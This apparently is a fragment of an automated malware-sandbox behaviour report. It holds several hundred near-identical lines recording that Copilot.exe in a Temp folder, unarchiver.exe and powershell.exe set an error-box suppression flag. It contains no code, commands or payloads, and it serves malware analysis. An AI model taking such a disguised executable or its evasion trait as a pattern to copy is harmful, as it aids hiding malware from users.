                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
